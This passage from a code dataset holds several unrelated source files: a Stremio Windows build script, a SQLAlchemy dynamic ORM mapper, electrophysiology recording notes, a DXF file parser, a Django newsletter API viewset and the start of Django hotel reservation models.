package_version=%i && echo %i', shell=True)\n \n strem_ver = vcvars_out.decode('utf-8').splitlines()[-1]\n print(f\"Pulled Stremio package version: {strem_ver}\")\n \n serverjs_url = f\"https://s3-eu-west-1.amazonaws.com/stremio-artifacts/four/v{strem_ver}/server.js\"\n if not os.path.exists(\"server.js\"): Helpers.basic_download(serverjs_url, \"server.js\")\n print(\"\\ndone.\\n\")\n\n # TODO: ensure the qt5dir path is not hardcoded and automatically grabbed somewhere in the initial instantiantion of the config items\n print(\"Building the Stremio Shell...\")\n subprocess.run(f'\"{self.depend_paths[\"vs_community\"]}\" && cmake -G\\\"NMake Makefiles\\\" -DCMAKE_PREFIX_PATH=\"C:\\\\Qt\\\\Qt5.12.7\\\\5.12.7\\\\msvc2017\\\\lib\\\\cmake\\\\Qt5\" -DCMAKE_BUILD_TYPE=Release . 
&& cmake --build ..', shell=True)\n # os.system(f'\"{self.depend_paths[\"vs_community\"]}\" && ')\n print(\"\\ndone.\\n\")\n\n print(\"Building solution directory structure...\")\n if not os.path.exists(\"abs-dist-win\"): \n os.mkdir(\"abs-dist-win\")\n else:\n # otherwise, clean the directory\n shutil.rmtree(\"abs-dist-win\")\n os.mkdir(\"abs-dist-win\")\n\n # OK\n print(\"Copying .\\\\stremio.exe -> abs-dist-win\\\\stremio.exe...\")\n shutil.copyfile('stremio.exe', 'abs-dist-win\\\\stremio.exe')\n print(\"\\ndone.\\n\")\n \n # OK\n print(\"Copying C:\\\\Windows\\\\System32\\\\msvcr120.dll -> abs-dist-win\\\\msvcr120.dll...\")\n shutil.copyfile('C:\\\\Windows\\\\System32\\\\msvcr120.dll', 'abs-dist-win\\\\msvcr120.dll')\n print(\"\\ndone.\\n\")\n \n # ..\\abs\\stremio-depends\\MPV\\libmpv-2.dll\n # input(self.depend_paths['mpv'] + \" : \" + os.getcwd())\n print(f\"Copying ..\\\\{self.depend_paths['mpv']} -> abs-dist-win\\\\{self.depend_paths['mpv']}...\")\n shutil.copyfile(f\"..\\\\{self.depend_paths['mpv']}\", f'abs-dist-win\\\\' + self.depend_paths[\"mpv\"].split(\"\\\\\")[-1].replace(\"2\", \"1\").replace(\"lib\", \"\"))\n print(\"\\ndone.\\n\")\n \n print(\"Copying .\\\\windows\\\\DS\\\\* -> abs-dist-win\\\\DS\\\\*...\")\n shutil.copytree('windows\\\\DS', 'abs-dist-win\\\\DS')\n print(\"\\ndone.\\n\")\n \n print(\"Copying server.js -> abs-dist-win\\\\server.js...\")\n shutil.copyfile('server.js', 'abs-dist-win\\\\server.js')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying .\\\\{self.depend_paths['openssl'].replace('openssl.exe', 'libcrypto-1_1.dll')} -> abs-dist-win\\\\libcrypto-1_1.dll...\")\n shutil.copyfile(f\"{self.depend_paths['openssl'].replace('openssl.exe', 'libcrypto-1_1.dll')}\", 'abs-dist-win\\\\libcrypto-1_1.dll')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying {self.where_is_path_var('node')} -> abs-dist-win\\\\node.exe...\")\n shutil.copyfile(f\"{self.where_is_path_var('node')}\", 'abs-dist-win\\\\node.exe')\n print(\"\\ndone.\\n\")\n \n print(f\"Copying ..\\\\{self.depend_paths['ffmpeg']} -> abs-dist-win\\\\ffmpeg.exe...\")\n shutil.copyfile(f\"..\\\\{self.depend_paths['ffmpeg']}\", 'abs-dist-win\\\\ffmpeg.exe')\n print(\"\\ndone.\\n\")\n \n print(\"Deploying QT Dependencies...\")\n os.system(f\"{self.depend_paths['qt']} --qmldir . abs-dist-win\\\\stremio.exe\")\n print(\"\\ndone.\\n\")\n\n print(\"Build complete! 
You can find the build in the stremio-shell\\\\abs-dist-win directory.\")","repo_name":"ShoobyDoo/AutoBuildStremio","sub_path":"abs/core/depends.py","file_name":"depends.py","file_ext":"py","file_size_in_byte":15936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42756456449","text":"from sqlalchemy.orm import registry, mapped_column, Mapped, Session, DeclarativeBase\n\nfrom sqlalchemy import Integer, create_engine, Text, select, Boolean, update,BINARY\nfrom .utils import getMockedCategoryData, sortedCategoryList, \\\n createCategoryIndex, getCategoryWeight, getMockedIsGeometry, unfold_sorted_category, unzip_except_dict, unzip_all\nfrom .LiteralEnum import CATEGORY, str2ormtype\nimport ast\n\n\nclass ORM_Mapper(object):\n mapper_registry = registry()\n\n @mapper_registry.mapped\n class CategoryStore(object):\n __tablename__ = \"CategoryStore\"\n\n name = mapped_column(Text, primary_key=True)\n\n category = mapped_column(Text)\n\n isGeometry = mapped_column(Boolean, default=False)\n\n def to_dict(self):\n return {ele.name: getattr(self, ele.name) for ele in\n self.__table__.columns}\n\n def __init__(self):\n self.engine = create_engine(\"sqlite:///./test.db\")\n self.mapper_registry.metadata.create_all(bind=self.engine)\n self.mapper_type = {}\n\n def build_ORM(self):\n \"\"\"\n clear tables except CategoryStore,then try to create all tables in orm.\n :return:\n \"\"\"\n self.mapper_type.clear()\n for table in self.mapper_registry.metadata.sorted_tables:\n if table.name != 'CategoryStore':\n self.mapper_registry.metadata.remove(table)\n\n categoryList = unfold_sorted_category(\n sortedCategoryList(self.__getCategories())\n )\n categoryList = list(\n map(self.__category2classtype, categoryList)\n )\n for category in categoryList:\n self.mapper_registry.mapped(\n category\n )\n self.mapper_type[category.__name__] = category\n\n self.mapper_registry.metadata.create_all(bind=self.engine)\n\n def addCategory(self, category: dict, isGeometry: bool):\n with Session(self.engine) as session:\n session.add(\n self.CategoryStore(\n name=category[\"name\"],\n category=str(category),\n isGeometry=isGeometry\n )\n )\n session.commit()\n return self\n\n def addCategories(self, categories: list[dict], isGeometry: list[bool]):\n with Session(self.engine) as session:\n for index, category in enumerate(categories):\n session.add(\n self.CategoryStore(\n name=category[\"name\"],\n category=str(category),\n isGeometry=isGeometry[index]\n )\n )\n session.commit()\n return self\n\n def deleteCategory(self, category_name: str):\n with Session(self.engine) as session:\n target = session.get(\n self.CategoryStore,\n {\n \"name\": category_name\n }\n )\n session.delete(target)\n session.commit()\n\n def deleteCategoriesWithCondition(self, conditions: list[dict]):\n with Session(self.engine) as session:\n for condition in conditions:\n target = session.get(\n self.CategoryStore,\n condition\n )\n session.delete(target)\n session.commit()\n\n def addDataForOneCategory(self, data_category_name: str, datas: list[dict]):\n with Session(self.engine) as session:\n for data in datas:\n session.add(\n self.mapper_type[data_category_name](\n **data\n )\n )\n session.commit()\n return self\n\n def selectDataFromOneCategory(self, category_name: str, num: int = 20):\n with Session(self.engine) as session:\n if num == -1:\n sql = select(\n self.mapper_type[category_name]\n )\n else:\n sql = select(\n self.mapper_type[category_name]\n ).limit(num)\n return [\n 
data.to_dict() for data in session.scalars(sql)\n ]\n return self\n\n def selectDatasWithUserDefinedCondition(self, category_name: str, condition: dict):\n\n target_category_class = self.mapper_type[category_name]\n\n with Session(self.engine) as session:\n sql = select(\n self.mapper_type[category_name]\n ).where(\n *[\n statement for statement in map(\n lambda ele: target_category_class.__getattribute__(target_category_class, ele[0]) == ele[1],\n condition.items()\n )\n ]\n )\n return [\n data.to_dict() for data in session.scalars(sql)\n ]\n\n def updateDataInOneCategory(self, category_name: str, update_ids: list[int],\n newer_data: list[dict]):\n with Session(self.engine) as session:\n for index, _id in enumerate(update_ids):\n sql = update(self.mapper_type[category_name]).where(\n self.mapper_type[category_name]._id == _id\n ).values(\n **self.mapper_type[category_name](\n **newer_data[index]).to_dict()\n )\n session.execute(sql)\n session.commit()\n\n def deleteDataInOneCategory(self, category_name: str, del_ids: list[int]):\n with Session(self.engine) as session:\n for _id in del_ids:\n target = session.get(\n self.mapper_type[category_name],\n {\n \"_id\": _id\n }\n )\n session.delete(target)\n session.commit()\n\n def testAddOneData(self, data: dict, data_category_name: str):\n with Session(self.engine) as session:\n t = self.mapper_type[data_category_name]\n session.add(\n t(**data)\n )\n session.commit()\n return self\n\n def getCategories(self):\n \"\"\"\n Expose to the invoker,it will ensure the categories its return are the unfolded categories,which means every category will be mapping\n to the bottom-level of data type.\n :return:\n \"\"\"\n self.__unfoldStoredCategory()\n with Session(self.engine) as session:\n sql = select(self.CategoryStore)\n return [\n category.to_dict() for category in session.scalars(sql)\n ]\n\n def __getCategories(self):\n with Session(self.engine) as session:\n sql = select(self.CategoryStore.category)\n return [\n ast.literal_eval(category) for category in session.scalars(sql)\n ]\n\n def __category2classtype(self, category: dict):\n \"\"\"Category -> ClassType\n \"\"\"\n\n class Base(DeclarativeBase):\n pass\n\n specifications = {\n key: val for key, val in\n map(lambda dic: (dic['keyName'], str2ormtype(dic['keyCategory'])),\n category[CATEGORY.specification])\n }\n if category[CATEGORY.name] == \"坐标\":\n print(1)\n specifications[\"__tablename__\"] = category[CATEGORY.name]\n specifications[\"_id\"] = mapped_column(Integer, primary_key=True,\n nullable=True)\n\n def to_dict(self):\n return {ele.name: getattr(self, ele.name) for ele in\n self.__table__.columns}\n\n def for_update(self):\n return {str(getattr(self, ele.name)): ele.name for ele in\n self.__table__.columns}\n\n def __getattribute__(self, name):\n print(\"self:\", self)\n return self.__getattribute__(name)\n\n specifications[\"to_dict\"] = to_dict\n specifications[\"for_update\"] = for_update\n # specifications[\"__getattribute__\"] = __getattribute__\n return type(\n category[CATEGORY.name],\n (),\n dict(specifications)\n )\n\n def __unfoldStoredCategory(self):\n categories = []\n with Session(self.engine) as session:\n sql = select(self.CategoryStore.category)\n categories = unfold_sorted_category(\n sortedCategoryList(\n [\n ast.literal_eval(category) for category in session.scalars(sql)\n ]\n )\n )\n for category in categories:\n\n sql = update(self.CategoryStore).where(self.CategoryStore.name == category[\"name\"]).values(\n\n category=str(category)\n\n )\n session.execute(sql)\n 
session.commit()\n\n print(categories)\n\n\nclass DataBaseHanlder(object):\n\n def __init__(self):\n self.ORMMapper = ORM_Mapper()\n self.ORMMapper.build_ORM()\n\n def Add_Categories(self, categories: list[dict], isGeometry: list[bool]):\n \"\"\"\n Category-format:\n {\n \"name\":\"category_name\",\n \"specification\":[{\n {\"keyName\":\"xxx\",\"keyCategory\":\"xxx\"}\n }]\n }\n :param categories:\n :param isGeometry:\n :return:\n \"\"\"\n self.ORMMapper.addCategories(\n categories, isGeometry\n )\n self.ORMMapper.build_ORM()\n\n def Get_Categories(self):\n return self.ORMMapper.getCategories()\n\n def Add_Data(self, category_name, datas: list[dict]):\n \"\"\"\n :param category_name:category's name.For instance:\"Position\"\n :param datas:[{\"spec_name\":\"spec_value}].For instance:[{\"Latitude\":22,\"Longitude\":11}]\n :return:\n \"\"\"\n self.ORMMapper.addDataForOneCategory(\n category_name, datas\n )\n\n def Get_Data_ByNums(self, category_name: str, num: int):\n \"\"\"\n :param category_name:\n :param num:If num == -1,then get all datas\n :return:\n \"\"\"\n return self.ORMMapper.selectDataFromOneCategory(\n category_name, num\n )\n\n def Get_Data_ByCondition(self, category_name: str, condition: dict):\n return self.ORMMapper.selectDatasWithUserDefinedCondition(\n category_name, condition\n )\n\n\nif __name__ == \"__main__\":\n # d = DataBaseHanlder()\n # d.Add_Categories(\n # [{\n # \"name\":\"你好\",\n # \"specification\":[\n # {\"keyName\": \"好感度\", \"keyCategory\": \"Double\"},\n # ]\n # }],[False]\n # )\n a = ORM_Mapper()\n a.build_ORM()\n # categories = unfold_sorted_category(\n # sortedCategoryList(getMockedCategoryData())\n # )\n # a.addCategories(categories,getMockedIsGeometry(4))\n # a.deleteCategoriesWithCondition(\n # [\n # {\n # \"name\":\"hello\"\n # },\n # {\n # \"name\":\"坐标\"\n # }\n # ]\n # )\n # print(a.build_ORM())\n # a.build_ORM()\n # print(a.selectDatasWithUserDefinedCondition(\"谈论点\", {\n # \"回复_坐标_id\": 1,\n # \"回复_id\": 1\n # }))\n # a.addDataForOneCategory(\"坐标\",[\n # {\n # \"纬度\":3,\n # \"经度\":44\n # }\n # ])\n # a.updateDataInOneCategory(\"坐标\",[6],[\n # {\n # \"纬度\": 23,\n # \"经度\": 121,\n # \"_id\":6\n # }\n # ])\n","repo_name":"WendaoLee/toys","sub_path":"JerseyWebGIS/orm/TypeSystem.py","file_name":"TypeSystem.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38276877505","text":"lengths = {'TT4':0, 'TT3':159, 'TT5':159, 'TT6':0}\n\nimpedence = {\n 'TT3':[35.6, 88.2, 75.9, 54.4],\n 'TT4':[29.2, 70.3, 65.8, 51.5],\n 'TT5':[91, 61.8, 87.3, 110],\n 'TT6':[103, 37.8, 184, 67.8]}\n\n\n\nlasercalibration = {\n 0.5:0.90,\n 1.0:1.40,\n 1.5:1.90,\n 2.0:2.35,\n 2.5:2.75,\n 3.0:3.05}\n\n\n'''\n1112 - 931um - Mouse is on the rig with the tetrodes in the Right craniotomy. Waiting for 10 mins for the mouse to wake up and the brain to settle\n\n\n1129 - 931um - possible background visual responses\n\n\nThe electrode impedences must be way too low - I cannot pick up any spikes. I can hear multi-unit activity but I need to remove the electrodes and try cutting them again. \n'''\n\nlengths = {'TT3':117, 'TT4':0, 'TT5':117, 'TT6':0}\n\nimpedence = {\n 'TT3':[399, 445, 447, 500],\n 'TT4':[329, 398, 453, 340],\n 'TT5':[508, 482, 292, 294],\n 'TT6':[512, 330, 405, 345]}\n\n\n\n'''\n\n1342 - 877um - mouse is back on the rig with tetrodes in the right craniotomy again,\nwaiting 10 mins. 
Excellent visually-responsive neurons\n\n1349 - 1171um - quiet\n\n1353 - 1680um - lots of spikes on TT4, 5, 6\n\n1354 - 1820um - probably through CA1\n\n1406 - 2989 - had many spikes, just got quiet again - waiting for 5 mins\n\n1418 - 3117um - good laser responses on TT4 but no sound responses yet\n\n\n'''\n\nfrom jaratoolbox.test.nick.database import cellDB\nrd = cellDB.Experiment('pinp007', '2015-11-25', 'nick', 'am_tuning')\n\nsite1 = rd.add_site(depth = 3750, goodTetrodes = [3, 4, 5, 6])\nsite1.add_session('14-44-56', None, 'NoiseBurst') #\nsite1.add_session('14-48-12', None, 'LaserPulse') #\nsite1.add_session('14-51-18', None, 'LaserTrain') #\nsite1.add_session('15-07-13', 'a', 'AM') #\n\n\n'''\n2mw - 15-40-02\n1mw - 15-43-38\n0.5mw - 15-46-52\nless - \n\n05mW, 0.1sec soa - \n\n16-08-30 0.05sec soa, all the responses blend together\n16-11-58 - 0.1sec soa, 0.5mW BUT with the filter engaged.\n\n\n\n\n1618 - We have determined that the site we are recording from responds to visual stimuli. The site\nseemed laser responsive, but at long latency and would respond each time to a train of laser pulses\n\nThe neurons here respond to the flashlight.\n\nI am calling it a day and removing the electrodes\n\n\n'''","repo_name":"sjara/jaratest","sub_path":"nick/inforecordings/pinp007/2015-11-25_pinp007recording.py","file_name":"2015-11-25_pinp007recording.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71677949927","text":"import ezdxf\r\nimport demjson\r\nimport uuid\r\nimport re\r\nimport sys\r\nimport math\r\n\r\n\r\nclass DxfReader:\r\n def __init__(self, abs_tol=20):\r\n self.abs_tol = abs_tol\r\n\r\n def parseDxf(self, dxfPath):\r\n tol = self.abs_tol\r\n dwg = ezdxf.readfile(dxfPath)\r\n msp = dwg.modelspace()\r\n result = {\r\n 'layers': {},\r\n 'entities': {\r\n 'line': {},\r\n 'arc': {},\r\n 'circle': {},\r\n 'hatch': {},\r\n 'dimension': {},\r\n 'mtext': {}\r\n },\r\n 'lineText': {},\r\n 'globalText': {}\r\n }\r\n lines = []\r\n mtexts = []\r\n dimensions = []\r\n self.__result = result\r\n self.__lines = lines\r\n self.__mtexts = mtexts\r\n self.__dimensions = dimensions\r\n for l in dwg.layers:\r\n layer = {\r\n 'id': str(uuid.uuid1()),\r\n 'name': l.dxf.name,\r\n 'color': l.dxf.color\r\n }\r\n result['layers'][layer['id']] = layer\r\n for entity in msp:\r\n self.__parseEntity(entity)\r\n\r\n for line in lines:\r\n start = line['start'].vec2\r\n end = line['end'].vec2\r\n x1 = start.x\r\n y1 = start.y\r\n x2 = end.x\r\n y2 = end.y\r\n theta = math.pi/2-math.atan2(y2-y1, x2-x1)\r\n if start.distance(end) == 0:\r\n continue\r\n a = math.sin(theta)\r\n b = math.cos(theta)\r\n rect = [\r\n ezdxf.math.Vec2(x1+tol*b, y1+tol*a),\r\n ezdxf.math.Vec2(x2+tol*b, y2+tol*a),\r\n ezdxf.math.Vec2(x2-tol*b, y2-tol*a),\r\n ezdxf.math.Vec2(x1-tol*b, y1-tol*a)\r\n ]\r\n for dimension in dimensions:\r\n p = dimension['defpoint'].vec2\r\n p1 = dimension['defpoint2'].vec2\r\n p2 = dimension['defpoint3'].vec2\r\n dx = p.x - p2.x\r\n dy = p.y - p2.y\r\n if abs(dx) < 0.1:\r\n dimension['axis'] = 'x'\r\n dimension['distance'] = dy\r\n elif abs(dy) < 0.1:\r\n dimension['axis'] = 'y'\r\n dimension['distance'] = dx\r\n p1OnLine = ezdxf.math.is_point_on_line_2d(\r\n p1, start, end, False, tol)\r\n p2OnLine = ezdxf.math.is_point_on_line_2d(\r\n p2, start, end, False, tol)\r\n if p1OnLine:\r\n if p1.isclose(start, tol/10):\r\n location = 'start'\r\n elif p1.isclose(end, tol/10):\r\n location = 'end'\r\n 
else:\r\n location = 'center'\r\n dimension['entity1'] = {\r\n 'id': line['id'], 'location': location}\r\n if p2OnLine:\r\n if p2.isclose(start, tol/10):\r\n location = 'start'\r\n elif p2.isclose(end, tol/10):\r\n location = 'end'\r\n else:\r\n location = 'center'\r\n dimension['entity2'] = {\r\n 'id': line['id'], 'location': location}\r\n if p1OnLine and p2OnLine:\r\n # print(dimension)\r\n line['mingzi'] = dimension['text']['mingzi']\r\n line['qujian'] = dimension['text']['qujian']\r\n line['gongshi'] = dimension['text']['gongshi']\r\n if result['entities']['dimension'].get(dimension['id']):\r\n del result['entities']['dimension'][dimension['id']]\r\n dimension['mingzi'] = dimension['text']['mingzi']\r\n dimension['qujian'] = dimension['text']['qujian']\r\n # dimension['gongshi'] = dimension['text']['gongshi']\r\n for mtext in mtexts:\r\n insert = mtext['insert'].vec2\r\n if (ezdxf.math.is_point_in_polygon_2d(insert, rect, tol) == 1):\r\n line['mingzi'] = mtext['text']['mingzi']\r\n line['qujian'] = mtext['text']['qujian']\r\n line['gongshi'] = mtext['text']['gongshi']\r\n for dimension in dimensions:\r\n del dimension['defpoint']\r\n del dimension['defpoint2']\r\n del dimension['defpoint3']\r\n del dimension['text']\r\n for mtext in mtexts:\r\n mtext['text'] = mtext['text']['text']\r\n return demjson.encode(result)\r\n\r\n def __parseEntity(self, entity):\r\n vid = str(uuid.uuid1())\r\n dxftype = entity.dxftype()\r\n result = self.__result\r\n lines = self.__lines\r\n mtexts = self.__mtexts\r\n dimensions = self.__dimensions\r\n data = {\r\n 'id': vid,\r\n 'type': dxftype,\r\n 'layer': getattr(entity.dxf, 'layer', None),\r\n 'color': getattr(entity.dxf, 'color', None)\r\n }\r\n if dxftype == 'LINE':\r\n data['start'] = entity.dxf.start\r\n data['end'] = entity.dxf.end\r\n result['entities']['line'][vid] = data\r\n lines.append(data)\r\n if dxftype == 'ARC' or dxftype == 'CIRCLE':\r\n data['center'] = entity.dxf.center\r\n data['radius'] = entity.dxf.radius\r\n if dxftype == 'ARC':\r\n data['start_angle'] = entity.dxf.start_angle\r\n data['end_angle'] = entity.dxf.end_angle\r\n data['clockwise'] = False\r\n result['entities']['arc'][vid] = data\r\n else:\r\n result['entities']['circle'][vid] = data\r\n if dxftype == 'MTEXT' or dxftype == 'TEXT':\r\n if dxftype == 'MTEXT':\r\n data['text'] = self.__getText(entity.text)\r\n data['font_size'] = entity.dxf.char_height\r\n anchor = entity.dxf.attachment_point\r\n if anchor == 1:\r\n data['anchor'] = [0, 0]\r\n if anchor == 2:\r\n data['anchor'] = [0.5, 0]\r\n if anchor == 3:\r\n data['anchor'] = [1, 0]\r\n if anchor == 4:\r\n data['anchor'] = [0, 0.5]\r\n if anchor == 5:\r\n data['anchor'] = [0.5, 0.5]\r\n if anchor == 6:\r\n data['anchor'] = [1, 0.5]\r\n if anchor == 7:\r\n data['anchor'] = [0, 1]\r\n if anchor == 8:\r\n data['anchor'] = [0.5, 1]\r\n if anchor == 9:\r\n data['anchor'] = [1, 1]\r\n else:\r\n data['text'] = self.__getText(entity.dxf.text)\r\n data['type'] = 'MTEXT'\r\n data['font_size'] = entity.dxf.height\r\n data['anchor'] = [0, 1]\r\n data['insert'] = entity.dxf.insert\r\n result['entities']['mtext'][vid] = data\r\n mtexts.append(data)\r\n if dxftype == 'DIMENSION':\r\n data['text'] = self.__getText(entity.dxf.text)\r\n data['font_size'] = entity.get_dim_style().dxf.dimtxt\r\n data['dimstyle'] = entity.dxf.dimstyle\r\n data['defpoint'] = entity.dxf.defpoint\r\n data['defpoint2'] = entity.dxf.defpoint2\r\n data['defpoint3'] = entity.dxf.defpoint3\r\n data['dimtype'] = entity.dxf.dimtype\r\n 
result['entities']['dimension'][vid] = data\r\n dimensions.append(data)\r\n if dxftype in [\"HATCH\"]:\r\n data['paths'] = []\r\n try:\r\n data['bgcolor'] = entity.bgcolor\r\n except:\r\n data['bgcolor'] = (0, 0, 0)\r\n for i in range(len(entity.paths)):\r\n if getattr(entity.paths[i], 'edges', None):\r\n path = {'edges': []}\r\n for j in range(len(entity.paths[i].edges)):\r\n edge = {}\r\n if entity.paths[i].edges[j].EDGE_TYPE == 'LineEdge':\r\n edge['start'] = entity.paths[i].edges[j].start\r\n edge['end'] = entity.paths[i].edges[j].end\r\n path['edges'].append(edge)\r\n data['paths'].append(path)\r\n if getattr(entity.paths[i], 'vertices', None):\r\n path = {'vertices': entity.paths[i].vertices}\r\n data['paths'].append(path)\r\n result['entities']['hatch'][vid] = data\r\n if dxftype == 'LWPOLYLINE':\r\n for vEntity in entity.virtual_entities():\r\n self.__parseEntity(vEntity)\r\n\r\n def __getText(self, rawText):\r\n result = {'text': '', 'rawText': rawText,\r\n 'mingzi': '', 'qujian': '', 'gongshi': ''}\r\n if(rawText is None):\r\n return result\r\n m = re.sub(r'^{|(<>)?}(<>)?$|\\\\[^;]*;', '', rawText)\r\n if m is None:\r\n return result\r\n result['text'] = m\r\n n = m.split(';')\r\n for s in n:\r\n if \"=\" in s:\r\n result['gongshi'] = s\r\n elif '~' in s or '-' in s:\r\n result['qujian'] = s\r\n elif '/' in s:\r\n result['qujian'] = s.replace('/', ', ')\r\n else:\r\n result['mingzi'] = s\r\n return result\r\n\r\n def __extractText(self, entities):\r\n for e in entities:\r\n if e['text'].get('to'):\r\n self.__result['lineText'][e['id']] = e\r\n else:\r\n self.__result['globalText'][e['id']] = e\r\n\r\n\r\ndef debug():\r\n reader = DxfReader()\r\n data = reader.parseDxf('./python/test/input.dxf')\r\n # data = reader.parseDxf('/Users/bfchen/Desktop/shared/n/sd/index/cached/0a77ff12fa711385d23bd6bffde3cd38.dxf')\r\n with open('./python/test/output.json', 'w+') as file:\r\n file = open('./python/test/output.json', 'w+')\r\n file.write(data)\r\n print('done')\r\n\r\n\r\nif len(sys.argv) < 2:\r\n debug()\r\n","repo_name":"Lucilor/ng-cad","sub_path":"src/python/dxfreader.py","file_name":"dxfreader.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11988666848","text":"from rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom newsletters.models import NewsLetters\nfrom newsletters.serializers import NewsletterSerializer\nfrom tags.models import Tags\nfrom tags.serializers import TagSerializer\nfrom users.models import Users\nfrom votes.models import Votes\nfrom votes.serializers import VoteSerializer\n\n\nclass NewsViewSet(viewsets.ModelViewSet):\n queryset = NewsLetters.objects.all()\n serializer_class = NewsletterSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n query = {}\n for item in self.request.query_params:\n if item in ['users', 'tags']:\n query[item + '__id'] = self.request.query_params[item]\n continue\n query[item + '__icontains'] = self.request.query_params[item]\n self.queryset = self.queryset.filter(**query)\n return super().get_queryset()\n\n @action(methods=['GET', 'POST', 'DELETE'], detail=True)\n def tags(self, request, pk=None):\n newsletter = self.get_object()\n if request.method == 'GET':\n serialized = TagSerializer(newsletter.tags, many=True)\n return Response(status=status.HTTP_200_OK, 
data=serialized.data)\n\n        if request.method == 'POST':\n            newsletter_id = request.data['tags']\n            for tag_id in newsletter_id:\n                tag = Tags.objects.get(id=int(tag_id))\n                newsletter.tags.add(tag)\n            return Response(status=status.HTTP_201_CREATED)\n\n        if request.method == 'DELETE':\n            newsletter_id = request.data['tags']\n            for tag_id in newsletter_id:\n                tag = Tags.objects.get(id=int(tag_id))\n                newsletter.tags.remove(tag)\n            return Response(status=status.HTTP_204_NO_CONTENT)\n\n    @action(methods=['POST'], detail=True)\n    def users(self, request, pk=None):\n        newsletter = self.get_object()\n        users_id = request.data['id']\n\n        for user_id in users_id:\n            user = Users.objects.get(id=int(user_id))\n            newsletter.users.add(user)\n        return Response(status=status.HTTP_201_CREATED)\n\n    # Display the votes of each bulletin\n\n    @action(methods=['GET'], detail=True)\n    def votes(self, request, pk=None):\n        newsletter = self.get_object()\n        votes = Votes.objects.filter(newsletter=int(newsletter.id))\n        serialized = VoteSerializer(votes, many=True)\n        return Response(status=status.HTTP_200_OK, data=serialized.data)\n","repo_name":"jesusmares82-hub/NewsLetter-API","sub_path":"newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70870348329","text":"from django.db import models\nfrom django.contrib import admin\nfrom django.core.validators import MinValueValidator\nfrom django.forms import ModelForm, Form, Textarea, TextInput, HiddenInput\nfrom django import forms\nfrom datetime import *\n#================================\nROOM_CURRENT = (\n\t('repair', 'Repair'),\n\t('occupied', 'Occupied'),\n\t('clean','Clean'),\n\t('dirty','Dirty')\n)\n\nCOLOR_CHOICES = {\n\t\"white\" : 0xFFFF,\n\t\"black\" : 0x0000,\n\n\t\t\t\t}\n\n\nCOLORLIST =(\n\t(\"White\",\"White\"), \n\t(\"Burlywood\",\"Burlywood\"),\n\t(\"Red\",\"Red\"),\n\t(\"Cyan\",\"Cyan\"),\n\t(\"Blue\",\"Blue\"),\n\t(\"Green\",\"Green\"),\n\t(\"Orange\",\"Orange\"),\n\t(\"RoyalBlue\",\"RoyalBlue\"),\n\t(\"Orchid\",\"Orchid\"),\n\t(\"NavajoWhite\",\"NavajoWhite\"),\n\t(\"Maroon\",\"Maroon\"),\n\t(\"Sienna\",\"Sienna\"),\n\t(\"Yellow\",\"Yellow\"),\n\t(\"Purple\",\"Purple\"),\n\t(\"DarkKhaki\",\"DarkKhaki\"),\n\t(\"Salmon\",\"Salmon\"),\n\t(\"SeaGreen\",\"SeaGreen\"),\n\t(\"OrangeRed\",\"OrangeRed\"),\n\t(\"YellowGreen\",\"YellowGreen\"),\n\t(\"DarkCyan\",\"DarkCyan\"),\n\t(\"Black\",\"Black\"),\n\t(\"HotPink\",\"HotPink\"),\n\t(\"Gray\",\"Gray\"),\n\t(\"Coral\",\"Coral\"),\n\t(\"SaddleBrown\",\"SaddleBrown\"),\n\t(\"SlateBlue\",\"SlateBlue\")\n)\n\nROOM_TYPE_CHOICES = (\n    ('standard','Standard'),\n    ('deluxe','Deluxe'),\n    ('pool_deluxe','Pool Deluxe'),\n    ('lanai','Lanai'),\n    ('presidential','Presidential'),\n    ('manor','Manor'),\n    ('suites','Suites')\n    )\n\n\nSOURCE_CHOICES = {\n\t('local_fit','Local FIT'),\n\t('tour','Tour Agency'),\n\t('fit','Tour FIT'),\n\n\t('govt','Government'),\n\t('promo','Promotional'),\n\t('rock','Rack Rate'),\n}\n\nRESERVATION_STATUS = (\n\t('notconfirmed','Not Confirmed'),\n\t('confirmed','Confirmed'),\n\t('checkin','Checked In'),\n\t('checkout','Checked Out'),\n\t('notpaid','Not Paid'),\n\t('prepaid' ,'Prepaid'),\n\t('cancel','Cancel'),\n\t('noshow', 'No Show'),\n)\nROOM_STATUS = (\n\t('checkin','Checked In'),\n\t('checkout','Checked Out'),\n\t('clean','Clean'),\n\t('dirty','Dirty'),\n\t('working','Working'),\n\t('none','None'),\n\n\n)\nVENUE_CHOICES = (\n\t('pool','Swimming 
Pool'),\n\t('confroom2','Conference 2nd'),\n\t('confroom3','Conference 3rd'),\n\t('cafe' ,'Cafe'),\n\t('vcourt','Volleyball Court'),\n\t('lobby','Lobby'),\n\t('back','Back Space'),\t\n\t('other','Other'),\n) \n\n\n#--------------------------------------------------------------------\nclass Rsvn (models.Model):\n\tstatus\t\t=\t models.CharField(max_length=13, choices=RESERVATION_STATUS)\n\n\tfirstname\t=\tmodels.CharField(max_length=30)\n\tlastname \t=\tmodels.CharField(max_length=30)\n\n\tsource \t=\t models.CharField(max_length=20, choices=SOURCE_CHOICES)\n\n\tphone1 \t\t=\tmodels.CharField(max_length=20)\n\tphone2 \t\t=\tmodels.CharField(max_length=20, blank=True)\n\n\tdateIn\t\t=\t models.DateField()\n\tdateOut\t\t=\t models.DateField()\n\n\trooms\t\t= \tmodels.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\ttype\t\t= \tmodels.CharField(max_length=15, choices=ROOM_TYPE_CHOICES)\n\tbeds\t\t= \tmodels.IntegerField(default=2,validators = [ MinValueValidator(1) ])\n\n\tadult\t\t=\t models.IntegerField(default=1,validators = [ MinValueValidator(1) ])\n\tchild\t\t=\t models.IntegerField(default=0,validators = [ 